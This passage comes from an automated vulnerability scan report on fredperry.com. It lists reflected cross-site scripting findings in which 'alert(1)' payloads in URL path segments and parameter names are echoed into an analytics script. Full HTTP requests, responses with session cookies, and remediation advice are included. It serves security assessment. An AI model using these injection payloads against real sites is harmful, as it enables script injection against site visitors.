This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rc2pet95p1bot5enhh22lhvkg2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> new-sty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1");
//]]>
...[SNIP]...

1.186. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24fed"-alert(1)-"4376cc421d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3r53k1uir2nojsecqug4val937; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/");
//]]>
...[SNIP]...

1.187. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19601"-alert(1)-"aa600d1ea66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bqm75d6efa21b78apj8pid2ip4; expires=Tue, 09-Nov-2010 17:19:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/");
//]]>
...[SNIP]...

1.188. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4ef"-alert(1)-"8619217da8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28ijbt4pspljfvkbg1krqmmf86; expires=Tue, 09-Nov-2010 17:19:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/");
//]]>
...[SNIP]...

1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3b5"-alert(1)-"13b0e4c6bfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pt1ta4js8a2p84pfab7quviqo1; expires=Tue, 09-Nov-2010 17:17:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1");
//]]>
...[SNIP]...

1.190. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3425"-alert(1)-"58b57485b7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b9c99toatbkak9qdctggl2tgm1; expires=Tue, 09-Nov-2010 17:16:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/");
//]]>
...[SNIP]...

1.191. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21758"-alert(1)-"0c629b616a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oeoprbob6gvfv4g1sfdilovuj6; expires=Tue, 09-Nov-2010 17:16:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/");
//]]>
...[SNIP]...

1.192. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987c1"-alert(1)-"18bec130932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shorts987c1"-alert(1)-"18bec130932/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9c2tjvetsb3nuc82tgrnhdpph7; expires=Tue, 09-Nov-2010 17:16:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shorts987c1"-alert(1)-"18bec130932/");
//]]>
...[SNIP]...

1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee86e"-alert(1)-"ca169360927 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9v6frfiehl9h83t9b8vh29f4v0; expires=Tue, 09-Nov-2010 17:14:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1");
//]]>
...[SNIP]...

1.194. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6071"-alert(1)-"d29439e175 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editione6071"-alert(1)-"d29439e175/women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sij4c4sr0g9sobd42obfm75li6; expires=Tue, 09-Nov-2010 17:14:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editione6071"-alert(1)-"d29439e175/women/skirts/");
//]]>
...[SNIP]...

1.195. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec008"-alert(1)-"80aa6a98e3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=go8661utj997ijktrdilvrbo94; expires=Tue, 09-Nov-2010 17:15:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/");
//]]>
...[SNIP]...

1.196. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 361b2"-alert(1)-"f83ab23d34f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oei1spgobhg9om8dfjglfbemp2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/");
//]]>
...[SNIP]...

1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af0b4"-alert(1)-"a8e2f292ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lkctfmg7af0li5fi70bo9nkir1; expires=Tue, 09-Nov-2010 17:14:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1");
//]]>
...[SNIP]...

1.198. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9eb"-alert(1)-"50f709e851f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
